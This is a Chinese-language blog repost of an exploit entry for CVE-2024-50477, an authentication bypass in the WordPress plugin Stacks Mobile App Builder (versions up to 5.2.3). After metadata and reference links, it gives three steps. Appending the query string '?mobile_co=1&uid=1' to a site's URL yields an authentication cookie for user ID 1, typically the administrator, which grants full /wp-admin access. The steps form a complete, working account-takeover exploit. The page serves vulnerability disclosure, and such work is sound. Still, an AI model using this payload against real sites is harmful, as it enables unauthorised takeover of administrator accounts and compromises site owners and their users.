Stacks Mobile App Builder 5.2.3 身份验证绕过漏洞:通过账户接管实现多Web应用利用

本文详细描述了Stacks Mobile App Builder插件5.2.3版本中的身份验证绕过漏洞(CVE-2024-50477),攻击者可通过添加特定查询参数模拟用户ID(如管理员ID 1)获取认证cookie,从而未经授权访问WordPress管理后台。漏洞影响多个Web应用平台,已提供复现步骤和参考链接。

漏洞标题:Stacks Mobile App Builder 5.2.3 - 通过账户接管实现身份验证绕过

日期:2024年10月25日

漏洞作者:stealthcopter

供应商主页:https://stacksmarket.co/

软件链接:https://wordpress.org/plugins/stacks-mobile-app-builder/

版本:<= 5.2.3

测试环境:Ubuntu 24.10/Docker

CVE:CVE-2024-50477

参考:

- https://github.com/stealthcopter/wordpress-hacking/blob/main/reports/stacks-mobile-app-builder-priv-esc/stacks-mobile-app-builder-priv-esc.md

- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stacks-mobile-app-builder/stacks-mobile-app-builder-523-authentication-bypass-via-account-takeover

  1. 导航到目标站点,并在URL后附加以下查询参数以模拟用户ID 1/?mobile_co=1&uid=1
  2. 您现在将收到指定用户ID(通常用户ID 1是站点管理员)的身份验证cookie。
  3. 访问 /wp-admin — 您应该拥有对管理员仪表板的完全访问权限。
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计